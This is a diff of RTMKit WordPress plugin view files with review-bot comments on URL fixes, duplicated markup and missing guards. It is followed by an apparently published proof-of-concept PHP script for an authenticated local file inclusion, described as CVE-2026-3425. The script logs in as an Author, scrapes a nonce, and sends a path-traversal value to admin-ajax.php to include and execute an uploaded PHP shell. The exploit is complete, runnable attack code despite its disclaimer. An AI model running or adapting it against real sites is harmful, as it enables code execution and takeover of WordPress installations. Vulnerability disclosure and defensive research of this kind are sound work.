+                    <div class="card rounded-4 text-center  flex-column justify-content-center align-items-center gap-3 p-4 h-100" style="background-image: url(<?php echo esc_url(RTM_KIT_URL . 'assets/images/banner-bg.png') ?>); background-size:cover; background-repeat:no-repeat;">
+                        <h4 class="accent-color fs-6">UPGRADE TO PRO</h4>
+                        <h1 class="m-0 fw-light fs-2 text-center lh-1">Unlock Now<br /><span class="fw-bold fs-2 lh-1 text-white">Hi-End Power</span></h1>
+                        <span class="text-white px-2">
                             Unlock the full power of your workflow. Access 70+ widgets, 25+ templates, 9 theme builder features, 1200+ icons, extensions, and priority support. Only in RTMkit Pro.
                         </span>
                         <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent fw-bold align-items-center gap-2">
--- a/rometheme-for-elementor/views/installed_templates.php
+++ b/rometheme-for-elementor/views/installed_templates.php
@@ -109,7 +109,7 @@
                                 </span>
                             </label>
                         <?php else : ?>
-                            <a href="http://localhost/wp.new/wp-admin/admin.php?page=rtmkit-upgrade-to-pro" class="btn btn-accent fw-bold" target="_blank">
+                            <a href="https://rometheme.net/plugins/rtmkit/pricing/" class="btn btn-accent fw-bold" target="_blank">
                                 <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                     <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
                                 </svg>
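Review bot: the removed line shipped a developer-machine URL (`http://localhost/wp.new/wp-admin/admin.php?page=rtmkit-upgrade-to-pro`) in a release view, which is a sign the template was never built from a site-relative helper. If an internal admin page was intended, use `admin_url('admin.php?page=rtmkit-upgrade-to-pro')` so the link follows the installation; if the external pricing page is the intent, the replacement is fine but should carry `rel="noopener noreferrer"` alongside `target="_blank"`.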
@@ -151,7 +151,6 @@
                                 <path d="M17.3837 9.26905C17.3933 9.2457 17.3989 9.22152 17.4059 9.19761C17.4118 9.17764 17.4194 9.15852 17.4236 9.13798C17.4321 9.09636 17.4357 9.05389 17.4366 9.0117C17.4366 9.00805 17.4377 9.00439 17.4377 9.00073C17.4377 8.95461 17.4329 8.9082 17.4239 8.86264C17.4197 8.84183 17.4118 8.82242 17.4059 8.80217C17.3989 8.77855 17.3936 8.75464 17.384 8.73158C17.3739 8.70739 17.3601 8.68517 17.3474 8.66239C17.3379 8.64523 17.3306 8.62723 17.3193 8.61064C17.2934 8.57183 17.2642 8.53583 17.2316 8.5032L10.9614 2.23245C10.6869 1.95767 10.2414 1.95767 9.96714 2.23245C9.69236 2.50695 9.69236 2.95217 9.96714 3.22667L15.0356 8.29536L1.26668 8.2827H1.26611C0.87827 8.2827 0.56327 8.59714 0.562988 8.98527C0.562707 9.37367 0.877145 9.68867 1.26555 9.68895L15.0389 9.70161L9.96743 14.7734C9.69264 15.0479 9.69264 15.4931 9.96743 15.7676C10.1047 15.9049 10.2847 15.9735 10.4647 15.9735C10.6447 15.9735 10.8247 15.9049 10.9619 15.7676L17.2318 9.4977C17.2647 9.46508 17.294 9.4288 17.3199 9.38998C17.3317 9.37255 17.3396 9.3537 17.3497 9.33542C17.3618 9.31348 17.375 9.29239 17.3846 9.26905H17.3837Z" fill="currentColor" />
                             </svg>
                             Import</button>
-
                     </div>
                 </div>
             </div>
@@ -188,7 +187,7 @@
                                 </span>
                             </label>
                         <?php else : ?>
-                            <a href="http://localhost/wp.new/wp-admin/admin.php?page=rtmkit-upgrade-to-pro" class="btn btn-accent fw-bold" target="_blank">
+                            <a href="https://rometheme.net/plugins/rtmkit/pricing/" class="btn btn-accent fw-bold" target="_blank">
                                 <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
                                     <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
                                 </svg>
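Review bot: this is the same one-line URL replacement as the hunk at line 109, with the full SVG markup duplicated verbatim, so the CTA exists in at least two copies in this file. Extract the upgrade button into a shared partial or helper function; with duplicated markup a future URL or attribute fix is likely to land in one copy and miss the other.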
@@ -249,7 +248,7 @@
                 </div>
             </div>
         </div>
-        <?php foreach ($datas['data_template'] as $data) :
+        <?php foreach ($datas['data_template'] as $data) :
             $manifest = json_decode(file_get_contents($rtmTemplateDir . '/' . $data['hash_id'] . '/manifest.json'));
             $imgurl = $rtmTemplateUrl . '/' . $data['hash_id'] . '/' . $manifest->templates[0]->screenshot;
         ?>
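Review bot: this hunk only changes trailing whitespace on the `foreach` line, but the context lines it touches deserve a check: `json_decode(file_get_contents(...))` is never tested for failure, and `$manifest->templates[0]->screenshot` is dereferenced unconditionally, so a missing or malformed `manifest.json` produces warnings or a fatal error on the templates page. Guard with `if ($manifest === null || empty($manifest->templates[0]->screenshot)) { continue; }` or similar. Since `$data['hash_id']` is concatenated into a filesystem path and a URL, it is also worth confirming where that value is validated (for example restricted to `[A-Za-z0-9_-]+`) before it reaches this view.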
--- a/rometheme-for-elementor/views/modules.php
+++ b/rometheme-for-elementor/views/modules.php
@@ -91,7 +91,7 @@
                 <div id="<?php echo esc_attr($c) ?>" class="card rounded-4  flex-column gap-3">
                     <div class="pb-4 pt-1 border-bottom d-flex align-items-center gap-3">
                         <i class="fa-solid fa-circle" style="font-size: 10px;"></i>
-                        <h4 class="m-0"><?php echo esc_html(ucwords($c)) ?></h4>
+                        <h4 class="m-0"><?php echo esc_html(ucwords($c == 'themebuilder' ? 'Theme Builder' : $c)) ?></h4>
                     </div>
                     <div class="row row-cols-3 g-3">
                         <?php
--- a/rometheme-for-elementor/views/setup-wizard.php
+++ b/rometheme-for-elementor/views/setup-wizard.php
@@ -407,7 +407,7 @@

                     <div class="footer">
                         <button id="next-button" class="btn btn-link" data-next="4">Back</button>
-                        <button id="next-button" class="btn btn-gradient-accent" data-next="6">Next</button>
+                        <button id="next-button" class="btn btn-gradient-accent" data-next="6">Skip</button>
                     </div>
                 </div>
             </div>
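Review bot: both buttons in this footer carry `id="next-button"`, which is invalid HTML (duplicate ids) and makes `getElementById` bind to only the first one; give the Back button its own id. Relabelling "Next" to "Skip" while keeping `data-next="6"` means the button behaves exactly as before, so either the step is now optional and a separate Next is no longer needed, or a Next button with its own target still has to be added.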
--- a/rometheme-for-elementor/views/sidebar.php
+++ b/rometheme-for-elementor/views/sidebar.php
@@ -26,6 +26,8 @@
 </svg>
 '
 ];
+
+$isProActive = RTMKitCorePlugin::instance()->pro_is_active();
 ?>


@@ -40,32 +42,34 @@
         <div class="menus gap-3">
             <?php foreach ($menus as $section => $items): ?>
                 <div class="menu-section">
-
-                        <button class="btn btn-transparent menu-dropdown" type="button" data-bs-toggle="collapse" data-bs-target="#<?php echo esc_attr($section) ?>" aria-expanded="<?php echo ($section == 'get_started') ? esc_attr("true") : esc_attr("false") ?>" aria-controls="<?php echo esc_attr($section) ?>">
-                            <h3 class="menu-section-title m-0"><?php echo $icons[$section] ?><?php echo esc_html(ucfirst(str_replace('_', ' ', $section))); ?></h3>
-                        </button>
-                        <div class="collapse <?php echo ($section == 'get_started') ? esc_attr("show") : "" ?>" id="<?php echo esc_attr($section) ?>">
-                            <ul class="menu-list">
-                                <?php foreach ($items as $key => $item): ?>
-                                    <li class="menu-item">
-                                        <a target="<?php echo esc_attr($item['target']) ?>" href="<?php echo (isset($item['target'])) ? esc_url($item['menu_slug']) : esc_url('admin.php?page=' . $item['menu_slug']); ?>" class="menu-link <?php echo $path === str_replace('_', '-', $key) ? 'current' : ''; ?>">
-                                            <?php echo esc_html($item['title']); ?>
-                                        </a>
-                                    </li>
-                                <?php endforeach; ?>
-                            </ul>
-                        </div>
-
+
+                    <button class="btn btn-transparent menu-dropdown" type="button" data-bs-toggle="collapse" data-bs-target="#<?php echo esc_attr($section) ?>" aria-expanded="<?php echo ($section == 'get_started') ? esc_attr("true") : esc_attr("false") ?>" aria-controls="<?php echo esc_attr($section) ?>">
+                        <h3 class="menu-section-title m-0"><?php echo $icons[$section] ?><?php echo esc_html(ucfirst(str_replace('_', ' ', $section))); ?></h3>
+                    </button>
+                    <div class="collapse <?php echo ($section == 'get_started') ? esc_attr("show") : "" ?>" id="<?php echo esc_attr($section) ?>">
+                        <ul class="menu-list">
+                            <?php foreach ($items as $key => $item): ?>
+                                <li class="menu-item">
+                                    <a target="<?php echo esc_attr($item['target']) ?>" href="<?php echo (isset($item['target'])) ? esc_url($item['menu_slug']) : esc_url('admin.php?page=' . $item['menu_slug']); ?>" class="menu-link <?php echo $path === str_replace('_', '-', $key) ? 'current' : ''; ?>">
+                                        <?php echo esc_html($item['title']); ?>
+                                    </a>
+                                </li>
+                            <?php endforeach; ?>
+                        </ul>
+                    </div>
+
                 </div>
             <?php endforeach; ?>
         </div>
     </div>
     <div class="sidebar-footer">
-        <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent">
-            <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
-                <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
-            </svg>
-            Go to Pro
-        </a>
+        <?php if (! $isProActive) : ?>
+            <a href="https://rometheme.net/plugins/rtmkit/pricing/" target="_blank" class="btn btn-accent">
+                <svg width="30" height="30" viewBox="0 0 24 29" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
+                    <path d="M3.49698 9.00236L4.78398 19.9374H19.227L20.513 9.00236L16.503 11.6754L12.005 5.37836L7.50698 11.6754L3.49698 9.00236ZM2.80598 6.13736L7.00498 8.93736L11.191 3.07636C11.2835 2.94673 11.4056 2.84107 11.5472 2.76816C11.6888 2.69526 11.8457 2.65723 12.005 2.65723C12.1642 2.65723 12.3212 2.69526 12.4628 2.76816C12.6044 2.84107 12.7265 2.94673 12.819 3.07636L17.005 8.93636L21.205 6.13736C21.3639 6.03169 21.5497 5.97368 21.7404 5.97019C21.9312 5.96669 22.119 6.01785 22.2817 6.11762C22.4443 6.2174 22.575 6.36163 22.6584 6.53328C22.7417 6.70493 22.7742 6.89684 22.752 7.08636L21.11 21.0534C21.0816 21.2968 20.9647 21.5213 20.7817 21.6843C20.5986 21.8472 20.3621 21.9373 20.117 21.9374H3.89398C3.6489 21.9373 3.41236 21.8472 3.22931 21.6843C3.04625 21.5213 2.92941 21.2968 2.90098 21.0534L1.25798 7.08736C1.2354 6.89761 1.26767 6.70536 1.35095 6.53337C1.43424 6.36138 1.56506 6.21686 1.72792 6.11691C1.89079 6.01696 2.07889 5.96576 2.26995 5.96939C2.461 5.97301 2.64702 6.0313 2.80598 6.13736ZM12.006 15.9374C11.7433 15.9374 11.4833 15.8858 11.2406 15.7853C10.9979 15.6849 10.7774 15.5376 10.5916 15.3519C10.4059 15.1663 10.2585 14.9458 10.1579 14.7032C10.0573 14.4606 10.0055 14.2005 10.0055 13.9379C10.0054 13.6752 10.0571 13.4151 10.1575 13.1725C10.258 12.9298 10.4052 12.7093 10.5909 12.5235C10.7766 12.3377 10.997 12.1904 11.2397 12.0898C11.4823 11.9892 11.7423 11.9374 12.005 11.9374C12.5354 11.9374 13.0441 12.1481 13.4192 12.5231C13.7943 12.8982 14.005 13.4069 14.005 13.9374C14.005 14.4678 13.7943 14.9765 13.4192 15.3516C13.0441 15.7266 12.5364 15.9374 12.006 15.9374Z" fill="#121416"></path>
+                </svg>
+                Go to Pro
+            </a>
+        <?php endif; ?>
     </div>
 </div>
 No newline at end of file
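Review bot: in the re-indented menu loop, `target="<?php echo esc_attr($item['target']) ?>"` reads `$item['target']` unconditionally while the `href` on the same line checks `isset($item['target'])`, so menu items without a target raise an undefined array key warning and emit an empty `target` attribute; guard it with `isset($item['target']) ? esc_attr($item['target']) : '_self'` or omit the attribute. `<?php echo $icons[$section] ?>` is unescaped output, which is acceptable only as long as `$icons` stays the static SVG array defined at the top of this view; a comment saying so would stop a later change from feeding it user-controlled data. The `$isProActive` gate on the "Go to Pro" footer is fine, since it only hides a link and is not an authorization boundary.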

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-3425 - RTMKit Addons for Elementor <= 2.0.2 - Authenticated (Author+) Local File Inclusion via 'path'

$target_url = 'http://example.com'; // Change to target WordPress site
$username = 'author'; // WordPress username with Author role
$password = 'password'; // WordPress password

// Step 1: Login and get cookies/nonce
$login_url = $target_url . '/wp-login.php';
$login_data = [
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Extract nonce from admin page
$admin_url = $target_url . '/wp-admin/admin.php?page=rtmkit';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$admin_page = curl_exec($ch);
curl_close($ch);

// Extract nonce from HTML
preg_match('/"rtmkit_nonce":"([a-f0-9]+)"/', $admin_page, $matches);
if (!isset($matches[1])) {
    // Try to find nonce in a script variable
    preg_match('/nonce\s*=\s*"([a-f0-9]+)"/', $admin_page, $matches);
    if (!isset($matches[1])) {
        die("Failed to extract nonce. Check target and credentials.\n");
    }
}
$nonce = $matches[1];
echo "[+] Extracted nonce: $nonce\n";

// Step 3: Exploit LFI via path traversal
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$payload = '../../../../wp-content/uploads/2026/03/evil'; // Path to uploaded PHP shell (without .php)
$post_data = [
    'action' => 'get_content',
    'nonce' => $nonce,
    'path' => $payload
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_HEADER, false);
$result = curl_exec($ch);
curl_close($ch);

echo "[+] Response:\n$result\n";
echo "[+] Exploit completed. If the file exists and contains PHP code, it was executed.\n";
?>
